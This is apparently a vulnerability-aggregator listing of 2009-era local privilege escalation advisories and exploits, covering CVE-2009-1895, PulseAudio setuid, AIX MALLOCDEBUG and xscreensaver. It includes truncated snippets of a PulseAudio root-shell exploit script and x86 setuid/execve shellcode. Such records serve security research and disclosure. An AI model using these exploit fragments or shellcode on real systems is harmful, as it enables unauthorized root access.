kernel: personality: fix PER_CLEAR_ON_SETID
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PER_CLEAR_ON_SETID setting that does not clear the ADDR_COMPAT_LAYOUT and MMAP_PAGE_ZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to (1) conduct NULL...
IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability
No description provided by source. #!/bin/bash [ASCII-art banner] http://root-the.net + IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability + Refer : securitytracker.com/id?1022261 + Exploit : Affix [email protected] + Tested on...
IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability
Exploit for aix platform in category local exploits ========================================================= IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability ========================================================= #!/bin/bash + IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability +...
Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : linux, linux-source-2.6.15 vulnerabilities (USN-807-1)
Michael Tokarev discovered that the RTL8169 network driver did not correctly validate buffer sizes. A remote attacker on the local network could send specially crafted traffic that would crash the system or potentially grant elevated privileges. CVE-2009-1389 Julien Tinnes and Tavis Ormandy...
USN-807-1: Linux kernel vulnerabilities
Michael Tokarev discovered that the RTL8169 network driver did not correctly validate buffer sizes. A remote attacker on the local network could send specially crafted traffic that would crash the system or potentially grant elevated privileges. CVE-2009-1389 Julien Tinnes and Tavis Ormandy...
PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)
Exploit for linux platform in category local exploits ===================================================================== PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0) ===================================================================== PulseAudio setuid Local Privilege...
PulseAudio setuid - Local Privilege Escalation
!/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include include include include include define...
PulseAudio setuid - Local Privilege Escalation
PulseAudio setuid - Local Privilege Escalation !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include...
PulseAudio setuid Local Privilege Escalation Exploit
No description provided by source. !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c EOF include stdio.h...
PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)
No description provided by source. PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp or change config.h. Must be on same fs as the...
Pulse Audio setuid Privilege Escalation
!/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include include include include include define...
GLSA-200907-13 : PulseAudio: Local privilege escalation
The remote host is affected by the vulnerability described in GLSA-200907-13 PulseAudio: Local privilege escalation Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself...
Null pointer dereference
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PER_CLEAR_ON_SETID setting that does not clear the ADDR_COMPAT_LAYOUT and MMAP_PAGE_ZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to (1) conduct NULL...
CVE-2009-1895
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PER_CLEAR_ON_SETID setting that does not clear the ADDR_COMPAT_LAYOUT and MMAP_PAGE_ZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to (1) conduct NULL...
xscreensaver 5.01 - Arbitrary File Disclosure Symlink
xscreensaver 5.01 - Arbitrary File Disclosure Symlink xscreensaver local arbitrary file disclosure | symlink attack The 'xscreensaver' program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on...
xscreensaver 5.01 - Arbitrary File Disclosure Symlink
xscreensaver local arbitrary file disclosure | symlink attack The 'xscreensaver' program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver...
xscreensaver Symlink Attack
xscreensaver local arbitrary file disclosure | symlink attack The ´xscreensaver´ program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver program...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes). Shellcode exploit for Linux/x86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid(0) shouldn't return -1 right? ; "\xb0\x0b" //mov...
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
Linux/x86 - Disable Shadowing Shellcode (42 bytes). Shellcode exploit for Linux/x86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid(0) shouldn't return -1 right? ; "\xb0\x0b" //mov...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL]) Shellcode (25 bytes). Shellcode exploit for Linux/x86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80...